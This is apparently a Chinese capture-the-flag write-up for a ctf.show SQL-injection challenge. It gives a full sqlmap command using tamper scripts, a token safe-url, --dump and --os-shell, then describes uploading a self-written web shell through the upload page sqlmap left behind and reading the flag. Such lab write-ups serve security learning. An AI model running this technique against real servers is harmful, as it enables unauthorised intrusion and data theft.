sqlmap 练习使用–os-shell 一键getshell
提示用os-shell getshell
前面的条件还是没变
在前一题的基础上加上 --os-shell
sqlmap -u http://2ed3ac47-a119-4626-8fb8-c4f6a16cdd6b.challenge.ctf.show:8080/api/index.php --referer ctf.show --safe-url http://2ed3ac47-a119-4626-8fb8-c4f6a16cdd6b.challenge.ctf.show:8080/api/getToken.php --safe-freq 1 --method PUT --headers content-type:text/plain --data id=1 --tamper space2comment.py,ctfshow_sql210_base64.py --dump --os-shell
选择服务器的类型 默认PHP
选择写入shell的目录
可以选直接选 1
发现跑出来失败
我们查阅他注入的过程
可以看到有个文件被上传成功了,我们浏览器访问一下
发现是一个上传文件的代码(sqlmap tql)
我们自己写一个shell 来尝试上传
发现上传成功,成功getshell,(估计是sqlmap的shell太大了还是怎样)
根目录下发现flag
直接读取
(刚开始以为是个目录,弄了一会,连上去看了才发现是个文件T_T)